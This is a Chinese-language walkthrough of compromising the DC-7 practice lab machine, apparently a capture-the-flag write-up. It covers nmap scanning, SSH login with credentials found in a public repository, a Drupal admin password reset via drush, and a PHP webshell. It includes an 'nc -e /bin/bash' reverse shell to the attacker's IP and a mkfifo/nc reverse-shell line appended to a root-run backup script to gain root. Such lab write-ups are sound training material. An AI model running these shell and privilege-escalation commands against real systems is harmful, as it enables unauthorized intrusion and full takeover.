DC-7靶机

ifconfig

查找主机IP

扫一波内网，探测下存活主机

nmap 192.168.61.0/24

使用nmap工具对DC-5靶机扫描开放的端口

nmap -A -T4 192.168.61.136 -p- -oN nmap136.A

nmap -A -T4 192.168.61.136 -p- -oN nmap136.A

有22和80端口

下面有提示DC7USER

百度一下

可以下载一个文件

这里也说明是重要点

下载到kali本地

git clone  https://github.com/Dc7User/staffdb

cd staffdb

ls

cat config.php

使用SSH链接靶机，登录dc7user发现可以成功连接

ssh [email protected]

ls

查到 backups  mbox

backups下：website.sql.gpg  website.tar.gz.gpg

发现两个文件，但都是以gpg结尾的，gpg命令是用来加密文件的，加密后的文件都是乱码

mbox是个文件

发现备份执行的源码在/opt/scripts目录下

进入/opt/scripts目录下

cd /opt/scripts

查看文件

cat backups.sh

发现两个命令 gpg drush

gpg命令用来加密，drush命令是drupal框架中用来做一些配置的命令，它可以改变用户名密码

进入到/var/www/html目录下，因为网站会有一个admin用户，所以使用drush命令修改admin用户的密码为123456，发现可以修改成功 

cd /var/www/html/
drush user-password admin --password="123456"

admin的密码改成了123456 

用dirb命令扫出页面

dirb http://192.168.61.136

在Content—>Add content-->Basic page下，准备添加PHP代码反弹shell，但是发现不支持PHP

百度后知道，php要单独作为一个模块导入 

 PHP的模块下载地址：

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

勾选，然后点最下面的install 

然后就可以了

回到当时的页面，就可以使用PHP了

 用蚁剑就可以连接成功了

 然后用kali监听

nc -lvvp 4444

nc -e /bin/bash 192.168.61.129 4444

python -c 'import pty;pty.spawn("/bin/bash")' 

连接成功 

find / -name backups.sh 2>/dev/null 

然后

cd /opt/scripts

ls -l

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh

nc -lvvp 7777

得到了root权限

cd /root

ls

cat theflag.txt